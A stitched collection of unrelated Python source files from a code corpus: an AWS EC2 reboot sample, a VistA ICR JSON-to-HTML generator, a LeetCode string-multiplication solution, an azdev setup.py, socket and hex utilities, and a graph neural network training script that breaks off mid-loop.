BODY = '{"qux": true, "foo": "bar", "baz": 1}'
class MockConsumer(object):
def __init__(self, configuration):
"""Creates a new instance of a Mock Consumer class. To perform
initialization tasks, extend Consumer._initialize
:param dict configuration: The configuration from rejected
"""
# Carry the configuration for use elsewhere
self._configuration = configuration
|
the-stack_106_23841 | # Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# This file is licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import boto3
from botocore.exceptions import ClientError
ec2 = boto3.client('ec2')
try:
ec2.reboot_instances(InstanceIds=['INSTANCE_ID'], DryRun=True)
except ClientError as e:
if 'DryRunOperation' not in str(e):
print("You don't have permission to reboot instances.")
raise
try:
response = ec2.reboot_instances(InstanceIds=['INSTANCE_ID'], DryRun=False)
print('Success', response)
except ClientError as e:
print('Error', e)
#snippet-sourcedescription:[rebooting.py demonstrates how to request a reboot of one or more Amazon EC2 instances.]
#snippet-keyword:[Python]
#snippet-keyword:[AWS SDK for Python (Boto3)]
#snippet-keyword:[Code Sample]
#snippet-keyword:[Amazon EC2]
#snippet-service:[ec2]
#snippet-sourcetype:[full-example]
#snippet-sourcedate:[2018-06-25]
#snippet-sourceauthor:[jschwarzwalder]
|
the-stack_106_23845 | #!/usr/bin/env python3
def gen_uv(width, height, scale=1.0):
w_inv = 1.0 / width
h_inv = 1.0 / height
uv = []
for h in range(height):
for w in range(width):
u = (w + 0.5) * w_inv * scale
v = (h + 0.5) * h_inv * scale
uv.append((u, v))
return uv
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("size", type=int, help="size of a texture. power of 2")
args = parser.parse_args()
uvs = gen_uv(args.size, args.size)
for uv in uvs:
print('{0[0]} {0[1]}'.format(uv))
|
the-stack_106_23846 | """ This module is going to parse ICR in JSON format and convert to html web page
"""
import json
import argparse
import os.path
import cgi
import logging
import pprint
from LogManager import logger, initConsoleLogging
from ICRSchema import ICR_FILE_KEYWORDS_LIST, SUBFILE_FIELDS
from ICRSchema import isSubFile, isWordProcessingField
from WebPageGenerator import getPackageHtmlFileName, getGlobalHtmlFileNameByName
from WebPageGenerator import getRoutineHtmlFileName
from DataTableHtml import outputDataTableHeader, outputDataTableFooter
from DataTableHtml import writeTableListInfo, outputDataListTableHeader
from DataTableHtml import outputLargeDataListTableHeader, outputDataRecordTableHeader
from DataTableHtml import outputFileEntryTableList, safeElementId
from InitCrossReferenceGenerator import createInitialCrossRefGenArgParser
from InitCrossReferenceGenerator import parseCrossRefGeneratorWithArgs
from FileManGlobalDataParser import generateSingleFileFieldToIenMappingBySchema
dox_url = "http://code.osehra.org/dox/"
pkgMap = {
'AUTOMATED INFO COLLECTION SYS': 'Automated Information Collection System',
'AUTOMATED MED INFO EXCHANGE': 'Automated Medical Information Exchange',
'BAR CODE MED ADMIN': 'Barcode Medication Administration',
'CLINICAL INFO RESOURCE NETWORK': 'Clinical Information Resource Network',
# u'DEVICE HANDLER',
# u'DISCHARGE SUMMARY',
'E CLAIMS MGMT ENGINE': 'E Claims Management Engine',
# u'EDUCATION TRACKING',
'EMERGENCY DEPARTMENT': 'Emergency Department Integration Software',
# u'EXTENSIBLE EDITOR',
# u'EXTERNAL PEER REVIEW',
'FEE BASIS CLAIMS SYSTEM' : 'Fee Basis',
'GEN. MED. REC. - GENERATOR': 'General Medical Record - Generator',
'GEN. MED. REC. - I/O' : 'General Medical Record - IO',
'GEN. MED. REC. - VITALS' : 'General Medical Record - Vitals',
# u'GRECC',
# u'HEALTH MANAGEMENT PLATFORM',
# u'INDIAN HEALTH SERVICE',
# u'INSURANCE CAPTURE BUFFER',
# u'IV PHARMACY',
# u'MASTER PATIENT INDEX',
'MCCR BACKBILLING' : 'MCCR National Database - Field',
# u'MINIMAL PATIENT DATASET',
# u'MOBILE SCHEDULING APPLICATIONS SUITE',
# u'Missing Patient Register',
'NATIONAL HEALTH INFO NETWORK' : 'National Health Information Network',
# u'NEW PERSON',
# u'PATIENT ASSESSMENT DOCUM',
# u'PATIENT FILE',
# u'PROGRESS NOTES',
# u'QUALITY ASSURANCE',
# u'QUALITY IMPROVEMENT CHECKLIST',
# u'REAL TIME LOCATION SYSTEM',
'TEXT INTEGRATION UTILITIES' : 'Text Integration Utility',
# u'UNIT DOSE PHARMACY',
'VA POINT OF SERVICE (KIOSKS)' : 'VA Point of Service',
# u'VDEM',
'VISTA INTEGRATION ADAPTOR' : 'VistA Integration Adapter',
'VENDOR - DOCUMENT STORAGE SYS' : 'Vendor - Document Storage Systems'
# u'VETERANS ADMINISTRATION',
# u'VOLUNTARY SERVICE SYSTEM',
# u'VPFS',
# u'cds',
# u'person.demographics',
# u'person.lookup',
# u'term',
# u'term.access'])
} # this is the mapping between CUSTODIAL PACKAGE and packages in Dox
def normalizeName(name):
return name.replace('/', ' ').replace('\'','').replace(',','').replace('.','').replace('&', 'and')
def useAjaxDataTable(len):
return len > 4000 # if has more than 4000 entries, use ajax approach
pgkUpperCaseNameDict = dict()
rpcNameToIenMapping = dict()
RPC_FILE_NO = '8994'
RPC_NAME_FIELD_NO = '.01'
def addToPackageMap(icrEntry, pkgName):
if 'CUSTODIAL PACKAGE' in icrEntry:
icrPkg = icrEntry['CUSTODIAL PACKAGE']
if icrPkg not in pkgMap:
pkgMap[icrPkg] = pkgName
logger.debug('[%s] ==> [%s]', icrPkg, pkgName)
elif pkgMap[icrPkg] != pkgName:
logger.debug('[%s] mapped to [%s] and [%s]', icrPkg, pkgMap[icrPkg], pkgName)
""" Util function to generate link for the fie """
def getICRIndividualHtmlFileLinkByIen(value, icrEntry, **kargs):
ien = icrEntry['NUMBER']
return '<a href=\"%s\">%s</a>' % ('ICR-' + ien + '.html', value)
def getPackageHRefLink(pkgName, icrEntry, **kargs):
if pkgName in pkgMap:
pkgLink = getPackageHtmlFileName(pkgMap[pkgName])
return '<a href=\"%s%s\">%s</a>' % (dox_url, pkgLink , pkgName)
crossRef = None
if 'crossRef' in kargs:
crossRef = kargs['crossRef']
if crossRef:
if len(pgkUpperCaseNameDict) == 0 :
for name in crossRef.getAllPackages().iterkeys():
pgkUpperCaseNameDict[name.upper()] = name
upperName = normalizeName(pkgName).upper()
if upperName in pgkUpperCaseNameDict:
addToPackageMap(icrEntry, pgkUpperCaseNameDict[upperName])
return '<a href=\"%s%s\">%s</a>' % (dox_url, getPackageHtmlFileName(pgkUpperCaseNameDict[upperName]) , pkgName)
pkg = crossRef.getPackageByName(pkgName)
if not pkg:
pkgRename = normalizeName(pkgName).title()
# logger.warn('[%s] renamed as [%s]', pkgName, pkgRename)
pkg = crossRef.getPackageByName(pkgRename)
if not pkg:
pkgRename = normalizeName(pkgName)
pkg = crossRef.getPackageByName(pkgRename)
if pkg:
addToPackageMap(icrEntry, pkg.getName())
pkgLink = getPackageHtmlFileName(pkg.getName())
return '<a href=\"%s%s\">%s</a>' % (dox_url, pkgLink , pkgName)
else:
logger.warn('Can not find mapping for package: [%s]', pkgName)
return pkgName
def getFileManFileHRefLink(fileNo, icrEntry, **kargs):
crossRef = None
if 'crossRef' in kargs:
crossRef = kargs['crossRef']
if crossRef:
fileInfo = crossRef.getGlobalByFileNo(fileNo)
if fileInfo:
linkName = getGlobalHtmlFileNameByName(fileInfo.getName())
logger.debug('link is [%s]', linkName)
# addToPackageMap(icrEntry, fileInfo.getPackage().getName())
return '<a href=\"%s%s\">%s</a>' % (dox_url, linkName, fileNo)
else:
logger.debug('Can not find file: [%s]', fileNo)
return fileNo
def getRoutineHRefLink(rtnName, icrEntry, **kargs):
crossRef = None
if 'crossRef' in kargs:
crossRef = kargs['crossRef']
if crossRef:
routine = crossRef.getRoutineByName(rtnName)
if routine:
logger.debug('Routine Name is %s, package: %s', routine.getName(), routine.getPackage())
# addToPackageMap(icrEntry, routine.getPackage().getName())
return '<a href=\"%s%s\">%s</a>' % (dox_url, getRoutineHtmlFileName(routine.getName()), rtnName)
else:
logger.debug('Can not find routine [%s]', rtnName)
logger.debug('After Categorization: routine: [%s], info: [%s]', rtnName, crossRef.categorizeRoutineByNamespace(rtnName))
return rtnName
def getRPCHRefLink(rpcName, icrEntry, **kargs):
if rpcName in rpcNameToIenMapping:
rpcFilename = '%s-%s.html' % (RPC_FILE_NO, rpcNameToIenMapping[rpcName])
return '<a href=\"%s\">%s</a>' % (rpcFilename, rpcName)
return rpcName
""" A list of fields that are part of the summary page for each package or all """
summary_list_fields = [
('IA #', 'NUMBER', None),
('Name', None, getICRIndividualHtmlFileLinkByIen),
('Type', None, None),
('Custodial Package', None, getPackageHRefLink),
# ('Custodial ISC', None),
('Date Created', None, None),
('DBIC Approval Status', None, None),
('Status', None, None),
('Usage', None, None),
('File #', 'FILE NUMBER', getFileManFileHRefLink),
# ('Global root', None, None),
('Remote Procedure', None, getRPCHRefLink),
('Routine', None, getRoutineHRefLink),
('Date Activated', None, None)
]
field_convert_map = {
'FILE NUMBER': getFileManFileHRefLink,
'ROUTINE': getRoutineHRefLink,
'CUSTODIAL PACKAGE': getPackageHRefLink,
'SUBSCRIBING PACKAGE': getPackageHRefLink,
'REMOTE PROCEDURE': getRPCHRefLink
}
class ICRJsonToHtml(object):
def __init__(self, crossRef, outDir):
self._crossRef = crossRef
self._outDir = outDir
"""
This is the entry point to convert JSON to html web pages
It will generate a total ICR summary page as well individual pages for each package.
It will also generate the pages for each individual ICR details
"""
def converJsonToHtml(self, inputJsonFile):
with open(inputJsonFile, 'r') as inputFile:
inputJson = json.load(inputFile)
self._generateICRSummaryPage(inputJson)
""" Utility function to convert icrEntry to summary info """
def _convertICREntryToSummaryInfo(self, icrEntry):
summaryInfo = [""]*len(summary_list_fields)
for idx, id in enumerate(summary_list_fields):
if id[1] and id[1] in icrEntry:
summaryInfo[idx] = icrEntry[id[1]]
elif id[0].upper() in icrEntry:
summaryInfo[idx] = icrEntry[id[0].upper()]
if summaryInfo[idx] and id[2]:
summaryInfo[idx] = id[2](summaryInfo[idx], icrEntry, crossRef=self._crossRef)
return summaryInfo
""" Summary page will contain summary information
"""
def _generateICRSummaryPage(self, inputJson):
pkgJson = {} # group by package
allpgkJson = []
for icrEntry in inputJson:
self._generateICRIndividualPage(icrEntry)
summaryInfo = self._convertICREntryToSummaryInfo(icrEntry)
allpgkJson.append(summaryInfo)
if 'CUSTODIAL PACKAGE' in icrEntry:
pkgJson.setdefault(icrEntry['CUSTODIAL PACKAGE'],[]).append(summaryInfo)
self._generateICRSummaryPageImpl(allpgkJson, 'ICR List', 'All', True)
for pkgName, outJson in pkgJson.iteritems():
self._generateICRSummaryPageImpl(outJson, 'ICR List', pkgName)
logger.warn('Total # entry in pkgMap is [%s]', len(pkgMap))
logger.warn('Total # entry in pkgJson is [%s]', len(pkgJson))
pprint.pprint(set(pkgJson.keys()) - set(pkgMap.keys()))
pprint.pprint(set(pgkUpperCaseNameDict.values()) - set(pkgMap.values()))
# pprint.pprint(pkgMap)
self._generatePkgDepSummaryPage(inputJson)
def _generatePkgDepSummaryPage(self, inputJson):
outDep = {}
for icrItem in inputJson:
curIaNum = icrItem['IA #']
# ignore the non-active icrs
if 'STATUS' not in icrItem or icrItem['STATUS'] != 'Active':
continue
if 'CUSTODIAL PACKAGE' in icrItem:
curPkg = icrItem['CUSTODIAL PACKAGE']
outDep.setdefault(curPkg,{})
if 'SUBSCRIBING PACKAGE' in icrItem:
for subPkg in icrItem['SUBSCRIBING PACKAGE']:
if 'SUBSCRIBING PACKAGE' in subPkg:
subPkgName = subPkg['SUBSCRIBING PACKAGE']
if isinstance(subPkgName,list):
for subPkgNameEntry in subPkgName:
subDep = outDep.setdefault(subPkgNameEntry, {}).setdefault('dependencies',{})
subDep.setdefault(curPkg, []).append(curIaNum)
curDep = outDep.setdefault(curPkg, {}).setdefault('dependents', {})
curDep.setdefault(subPkgNameEntry, []).append(curIaNum)
else:
subDep = outDep.setdefault(subPkgName, {}).setdefault('dependencies',{})
subDep.setdefault(curPkg, []).append(curIaNum)
curDep = outDep.setdefault(curPkg, {}).setdefault('dependents', {})
curDep.setdefault(subPkgName, []).append(curIaNum)
""" Convert outDep to html page """
outDir = self._outDir
outFilename = "%s/ICR-PackageDep.html" % outDir
with open(outFilename, 'w+') as output:
output.write("<html>\n")
tName = safeElementId("%s-%s" % ('ICR', 'PackageDep'))
outputDataListTableHeader(output, tName)
output.write("<body id=\"dt_example\">")
output.write("""<div id="container" style="width:80%">""")
outputDataTableHeader(output, ['Package Name', 'Dependencies Information'], tName)
""" table body """
output.write("<tbody>\n")
""" Now convert the ICR Data to Table data """
for pkgName in sorted(outDep.iterkeys()):
output.write("<tr>\n")
output.write("<td>%s</td>\n" % getPackageHRefLink(pkgName, {'CUSTODIAL PACKAGE': pkgName}, crossRef=self._crossRef))
""" Convert the dependencies and dependent information """
output.write("<td>\n")
output.write ("<ol>\n")
for pkgDepType in sorted(outDep[pkgName].iterkeys()):
output.write ("<li>\n")
output.write ("<dt>%s:</dt>\n" % pkgDepType.upper())
depPkgInfo = outDep[pkgName][pkgDepType]
for depPkgName in sorted(depPkgInfo.iterkeys()):
outputInfo = getPackageHRefLink(depPkgName, {'CUSTODIAl PACKAGE': depPkgName}, crossRef=self._crossRef)
outputInfo += ':   Total # of ICRs %s : [' % len(depPkgInfo[depPkgName])
for icrNo in depPkgInfo[depPkgName]:
outputInfo += getICRIndividualHtmlFileLinkByIen(icrNo, {'NUMBER': icrNo}, crossRef=self._crossRef) + '  '
outputInfo += ']'
output.write ("<dt>%s:</dt>\n" % outputInfo)
output.write ("</li>\n")
output.write ("</ol>\n")
output.write("</td>\n")
output.write ("</tr>\n")
output.write("</tbody>\n")
output.write("</table>\n")
output.write("</div>\n")
output.write("</div>\n")
output.write ("</body></html>\n")
def _generateICRSummaryPageImpl(self, inputJson, listName, pkgName, isForAll=False):
outDir = self._outDir
listName = listName.strip()
pkgName = pkgName.strip()
pkgHtmlName = pkgName
outFilename = "%s/%s-%s.html" % (outDir, pkgName, listName)
if not isForAll:
if pkgName in pkgMap:
pkgName = pkgMap[pkgName]
pkgHtmlName = pkgName + '-ICR.html'
outFilename = "%s/%s" % (outDir, pkgHtmlName)
with open(outFilename, 'w+') as output:
output.write("<html>\n")
tName = "%s-%s" % (listName.replace(' ', '_'), pkgName.replace(' ', '_'))
useAjax = useAjaxDataTable(len(inputJson))
columnNames = [x[0] for x in summary_list_fields]
searchColumns = ['IA #', 'Name', 'Custodial Package',
'Date Created', 'File #', 'Remote Procedure',
'Routine', 'Date Activated']
if useAjax:
ajaxSrc = '%s_array.txt' % pkgName
outputLargeDataListTableHeader(output, ajaxSrc, tName,
columnNames, searchColumns)
else:
outputDataListTableHeader(output, tName, columnNames, searchColumns)
output.write("<body id=\"dt_example\">")
output.write("""<div id="container" style="width:80%">""")
if isForAll:
output.write("<h1>%s %s</h1>" % (pkgName, listName))
else:
output.write("<h2 align=\"right\"><a href=\"./All-%s.html\">"
"All %s</a></h2>" % (listName, listName))
output.write("<h1>Package: %s %s</h1>" % (pkgName, listName))
# pkgLinkName = getPackageHRefLink(pkgName)
outputDataTableHeader(output, columnNames, tName)
outputDataTableFooter(output, columnNames, tName)
""" table body """
output.write("<tbody>\n")
if not useAjax:
""" Now convert the ICR Data to Table data """
for icrSummary in inputJson:
output.write("<tr>\n")
for item in icrSummary:
#output.write("<td class=\"ellipsis\">%s</td>\n" % item)
output.write("<td>%s</td>\n" % item)
output.write("</tr>\n")
else:
logging.info("Ajax source file: %s" % ajaxSrc)
""" Write out the data file in JSON format """
outJson = {"aaData": []}
with open(os.path.join(outDir, ajaxSrc), 'w') as ajaxOut:
outArray = outJson["aaData"]
for icrSummary in inputJson:
outArray.append(icrSummary)
json.dump(outJson, ajaxOut)
output.write("</tbody>\n")
output.write("</table>\n")
output.write("</div>\n")
output.write("</div>\n")
output.write ("</body></html>\n")
""" This is to generate a web page for each individual ICR entry """
def _generateICRIndividualPage(self, icrJson):
ien = icrJson['NUMBER']
outIcrFile = os.path.join(self._outDir, 'ICR-' + ien + '.html')
tName = safeElementId("%s-%s" % ('ICR', ien))
with open(outIcrFile, 'w') as output:
output.write ("<html>")
outputDataRecordTableHeader(output, tName)
output.write("<body id=\"dt_example\">")
output.write("""<div id="container" style="width:80%">""")
output.write ("<h1>%s (%s) %s (%s)</h1>\n" % (icrJson['NAME'], ien,
'ICR',
ien))
outputFileEntryTableList(output, tName)
""" table body """
self._icrDataEntryToHtml(output, icrJson)
output.write("</tbody>\n")
output.write("</table>\n")
output.write("</div>\n")
output.write("</div>\n")
output.write ("</body></html>")
def _icrDataEntryToHtml(self, output, icrJson):
fieldList = ICR_FILE_KEYWORDS_LIST
""" As we do not have a real schema to define the field order,
we will have to guess the order here
"""
for field in fieldList:
if field in icrJson: # we have this field
value = icrJson[field]
if isSubFile(field):
output.write ("<tr>\n")
output.write("<td>%s</td>\n" % field)
output.write("<td>\n")
output.write ("<ol>\n")
self._icrSubFileToHtml(output, value, field)
output.write ("</ol>\n")
output.write("</td>\n")
output.write ("</tr>\n")
continue
value = self._convertIndividualFieldValue(field, icrJson, value)
output.write ("<tr>\n")
output.write ("<td>%s</td>\n" % field)
output.write ("<td>%s</td>\n" % value)
output.write ("</tr>\n")
def _icrSubFileToHtml(self, output, icrJson, subFile):
logger.debug('subFile is %s', subFile)
logger.debug('icrJson is %s', icrJson)
fieldList = SUBFILE_FIELDS[subFile]
if subFile not in fieldList:
fieldList.append(subFile)
for icrEntry in icrJson:
output.write ("<li>\n")
for field in fieldList:
if field in icrEntry: # we have this field
value = icrEntry[field]
logger.debug('current field is %s', field)
if isSubFile(field) and field != subFile: # avoid recursive subfile for now
logger.debug('field is a subfile %s', field)
output.write ("<dl><dt>%s:</dt>\n" % field)
output.write ("<dd>\n")
output.write ("<ol>\n")
self._icrSubFileToHtml(output, value, field)
output.write ("</ol>\n")
output.write ("</dd></dl>\n")
continue
value = self._convertIndividualFieldValue(field, icrEntry, value)
output.write ("<dt>%s: %s</dt>\n" % (field, value))
output.write ("</li>\n")
def _convertIndividualFieldValue(self, field, icrEntry, value):
if isWordProcessingField(field):
if type(value) is list:
value = "\n".join(value)
value = '<pre>\n' + cgi.escape(value) + '\n</pre>\n'
return value
if field in field_convert_map:
if type(value) is list:
logger.warn('field: [%s], value:[%s], icrEntry: [%s]', field, value, icrEntry)
return value
value = field_convert_map[field](value, icrEntry, crossRef=self._crossRef)
return value
return value
""" This function will read all entries in RPC file file# 8994 and return a mapping
of RPC Name => IEN.
"""
def createArgParser():
initParser = createInitialCrossRefGenArgParser()
parser = argparse.ArgumentParser(description='VistA ICR JSON to Html',
parents=[initParser])
parser.add_argument('icrJsonFile', help='path to the VistA ICR JSON file')
parser.add_argument('outDir', help='path to the output web page directory')
return parser
def createRemoteProcedureMapping(result, crossRef):
return generateSingleFileFieldToIenMappingBySchema(result.MRepositDir,
crossRef,
RPC_FILE_NO,
RPC_NAME_FIELD_NO)
if __name__ == '__main__':
parser = createArgParser()
result = parser.parse_args()
initConsoleLogging()
crossRef = parseCrossRefGeneratorWithArgs(result)
# pprint.pprint(set(crossRef.getAllPackages().keys()))
# initConsoleLogging(logging.DEBUG)
if result.icrJsonFile:
rpcNameToIenMapping = createRemoteProcedureMapping(result, crossRef)
icrJsonToHtml = ICRJsonToHtml(crossRef, result.outDir)
icrJsonToHtml.converJsonToHtml(result.icrJsonFile)
|
the-stack_106_23848 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 VMware, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from tacker.api import extensions
from tacker.api.v1 import base
from tacker import manager
# Attribute Map
RESOURCE_ATTRIBUTE_MAP = {
'ext_test_resources': {
'id': {'allow_post': False, 'allow_put': False,
'validate': {'type:uuid': None},
'is_visible': True},
'name': {'allow_post': True, 'allow_put': True,
'validate': {'type:string': None},
'is_visible': True, 'default': ''},
'tenant_id': {'allow_post': True, 'allow_put': False,
'required_by_policy': True,
'validate': {'type:string': None},
'is_visible': True},
}
}
class Extensionattribute(extensions.ExtensionDescriptor):
@classmethod
def get_name(cls):
return "Extension Test Resource"
@classmethod
def get_alias(cls):
return "ext-obj-test"
@classmethod
def get_description(cls):
return "Extension Test Resource"
@classmethod
def get_namespace(cls):
return ""
@classmethod
def get_updated(cls):
return "2013-02-05T10:00:00-00:00"
def update_attributes_map(self, attributes):
super(Extensionattribute, self).update_attributes_map(
attributes, extension_attrs_map=RESOURCE_ATTRIBUTE_MAP)
@classmethod
def get_resources(cls):
"""Returns Ext Resources."""
exts = []
plugin = manager.TackerManager.get_plugin()
resource_name = 'ext_test_resource'
collection_name = resource_name + "s"
params = RESOURCE_ATTRIBUTE_MAP.get(collection_name, dict())
controller = base.create_resource(collection_name,
resource_name,
plugin, params,
member_actions={})
ex = extensions.ResourceExtension(collection_name,
controller,
member_actions={})
exts.append(ex)
return exts
def get_extended_resources(self, version):
if version == "2.0":
return RESOURCE_ATTRIBUTE_MAP
else:
return {}
class ExtensionObjectTestPluginBase(object):
@abc.abstractmethod
def create_ext_test_resource(self, context, router):
pass
@abc.abstractmethod
def get_ext_test_resource(self, context, id, fields=None):
pass
|
the-stack_106_23849 | #
# @lc app=leetcode id=43 lang=python3
#
# [43] Multiply Strings
#
# @lc code=start
class Solution:
def multiply(self, num1, num2):
s = 0
for i in range(len(num1) - 1, -1, -1):
p1 = 10 ** (len(num1) - 1 - i)
for j in range(len(num2) - 1, -1, -1):
p2 = 10 ** (len(num2) - 1 - j)
up = int(num1[i]) * p1
down = int(num2[j]) * p2
s += up * down
return str(s)
# @lc code=end
|
the-stack_106_23851 | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -----------------------------------------------------------------------------
"""Azure Developer Tools package that can be installed using setuptools"""
from codecs import open
import os
import re
from setuptools import setup, find_packages
azdev_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(azdev_path, 'azdev', '__init__.py'), 'r') as version_file:
__VERSION__ = re.search(r'^__VERSION__\s*=\s*[\'"]([^\'"]*)[\'"]',
version_file.read(), re.MULTILINE).group(1)
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azdev',
version=__VERSION__,
description='Microsoft Azure CLI Developer Tools',
long_description=README + '\n\n' + HISTORY,
url='https://github.com/Azure/azure-cli-dev-tools',
author='Microsoft Corporation',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9'
],
keywords='azure',
python_requires='>=3.6',
packages=[
'azdev',
'azdev.config',
'azdev.operations',
'azdev.mod_templates',
'azdev.operations.help',
'azdev.operations.help.refdoc',
'azdev.operations.linter',
'azdev.operations.linter.rules',
'azdev.operations.linter.pylint_checkers',
'azdev.operations.testtool',
'azdev.operations.extensions',
'azdev.utilities',
],
install_requires=[
'azure-multiapi-storage',
'docutils',
'flake8',
'gitpython',
'jinja2',
'knack',
'pylint==2.8.2',
'pytest-xdist', # depends on pytest-forked
'pytest>=5.0.0',
'pyyaml',
'requests',
'sphinx==1.6.7',
'tox',
'wheel==0.30.0'
],
package_data={
'azdev.config': ['*.*', 'cli_pylintrc', 'ext_pylintrc'],
'azdev.mod_templates': ['*.*'],
'azdev.operations.linter.rules': ['ci_exclusions.yml']
},
include_package_data=True,
entry_points={
'console_scripts': ['azdev=azdev.__main__:main']
}
)
|
the-stack_106_23852 | from __future__ import print_function
import platform
import socket
import errno
import os
def get_input():
try:
return raw_input()
except NameError:
return input()
def set_bit(v, index, x):
"""
Set the index:th bit of v to x, and return the new value.
Note that bit numbers (index) are from 0, with 0 being the least significant bit.
"""
mask = 1 << index
v &= ~mask
if x:
v |= mask
return v
def encodeString(s):
return bytearray(s.encode('utf-8'))
def get_connected_local_socket(pathname="theroothelper"):
o = platform.uname()[0].lower()
if 'linux' in o:
str1 = "\0" + pathname
elif 'darwin' not in o and 'win' in o:
raise OSError("Unsupported local sockets on Windows OS")
else: # apple and bsd
str1 = "/tmp/"+pathname
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(str1)
return sock
def toHex(s_):
if isinstance(s_,str): # str/bytes in Python 2, unicode string in python 3
return ":".join("{:02x}".format(ord(c)) for c in s_)
else:
if isinstance(s_, bytes) or isinstance(s_, bytearray):
s = s_ if isinstance(s_,bytearray) else bytearray(s_)
return ':'.join(format(x, '02x') for x in s)
else: # try with unicode type, python2 only
return ":".join("{:02x}".format(ord(c)) for c in s_.encode('utf-8'))
def intFromOctalString(s):
if s[:2] == '0o': # python 3 syntax
s = '0'+s[2:] # python 2 syntax
return int(s, 8)
def pathConcat(base_path, sub_path, sep=None, detectSep=False):
if detectSep:
if '/' in base_path:
return os.path.join(base_path, sub_path).replace('\\', '/')
elif '\\' in base_path:
return os.path.join(base_path, sub_path).replace('/', '\\')
joined_path = os.path.join(base_path, sub_path)
if sep:
joined_path = joined_path.replace('\\', sep).replace('/',sep)
return joined_path |
the-stack_106_23853 | import numpy as np
import pandas as pd
import os.path as osp
import statistics
import torch
from torch_geometric.datasets import TUDataset
import torch_geometric.transforms as T
import torch.nn.functional as F
from torch_geometric.data import DataLoader, Dataset
from optimal_R import option, all_possible_concatenation
from graph_property import G_property, binning
from model.GNN import Net, debug_MLP
from utils import max_len_arr, tSNE_vis
from f_f_TU import valid, test
def train(i, j, dn, model, task, optimizer, train_loader, device, k = 6):
total_loss = 0
model.train()
total_num_nodes = 0
t= 0
graph_embed = 0
linear_embed = 0
for load in train_loader:
name = r'/home/jiaqing/桌面/Fea2Fea/Result/TUdataset/' + dn + '/' + dn + '_property' + str(t) + task +'.txt'
property_file = pd.read_csv(name, sep = '\t')
propert_i = property_file.iloc[:,list(i)] if isinstance(i,tuple) else property_file.iloc[:,[i]]
array = np.array(propert_i)
load.x = torch.tensor(array).float()
propert_j = property_file.iloc[:,[j]]
array_2 = np.array(propert_j)
number = len(array_2)
load.y = binning(array_2, k = k, data_len = number)
# --------- training loop ---------- #
load = load.to(device)
optimizer.zero_grad()
out = model(load)
loss = F.nll_loss(out,load.y)
loss.backward()
optimizer.step()
total_loss += loss.item() * len(load.y)
total_num_nodes+=len(load.y)
if t == 0:
graph_embed = model.graph_embed
linear_embed = model.linear_embed
t+=1
#print(loss)
train_loss = total_loss / total_num_nodes
return train_loss, graph_embed, linear_embed
def train_tsne(i, j, dn, l_m, g_m, task, train_loader, device, k = 6):
t = 0
for load in train_loader:
name = r'/home/jiaqing/桌面/Fea2Fea/Result/TUdataset/' + dn + '/' + dn + '_property' + str(t) + task +'.txt'
property_file = pd.read_csv(name, sep = '\t')
propert_i = property_file.iloc[:,list(i)] if isinstance(i,tuple) else property_file.iloc[:,[i]]
array = np.array(propert_i)
load.x = torch.tensor(array).float()
propert_j = property_file.iloc[:,[j]]
array_2 = np.array(propert_j)
number = len(array_2)
load.y = binning(array_2, k = k, data_len = number)
load = load.to(device)
#out = model(load)
tSNE_vis(l_m, load.y, 'mlp_embed', d_name, inp, outp, 6)
#tSNE_vis(data.x, data.y, 'init_embed', d_name, inp, outp, 6)
tSNE_vis(g_m, load.y, 'graph_embed', d_name, inp, outp, 6)
break
if __name__ == '__main__':
paths = osp.join('/home/jiaqing/桌面/Fea2Fea/data/')
test_case = [(1, 3)]
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
dataset_name = ['ENZYMES', 'PROTEINS', 'NCI1']
for dataset in dataset_name:
d_name = dataset
data_set = TUDataset(paths + dataset, name = dataset, use_node_attr = False)
path = r'/home/jiaqing/桌面/Fea2Fea/Result/TUdataset/'
train_len, valid_len= int(0.8 * len(data_set)), int(0.1 * len(data_set))
test_len = len(data_set) - train_len - valid_len
batchsize = 16 if dataset != 'NCI1' else 32
train_loader = DataLoader(data_set[0:train_len], batch_size = batchsize , shuffle=False) #### batch size 32 for NCI1
valid_loader = DataLoader(data_set[train_len:(train_len+valid_len)], batch_size = batchsize , shuffle = False) #### batch size 32 for NCI1
test_loader = DataLoader(data_set[(train_len+valid_len):len(data_set)], batch_size = batchsize , shuffle = False) #### batch size 32 for NCI1
embedding = 0
graph_embedding = 0
for (inp, outp) in test_case:
best_epoch = 0
best_valid_acc = 0
best_test_acc = 0
op_iters = 0
#print(tmp_txt[1][2])
# take the optimal embedding method as graph embedding
#print(tmp_txt[input][out])
tmp_txt = pd.read_csv(path + d_name + '_optimal_method.txt', sep = '\t', header = None) # array
model = Net(embedding=tmp_txt[inp][outp]).to(device) if tmp_txt[inp][outp] != 'MLP' else debug_MLP().to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=0.03, weight_decay=1e-4)
best_linear_embed = 0
best_graph_embed = 0
for epoch in range(1, 300):
if d_name == 'NCI1':
if inp == 2 or outp == 2:
break
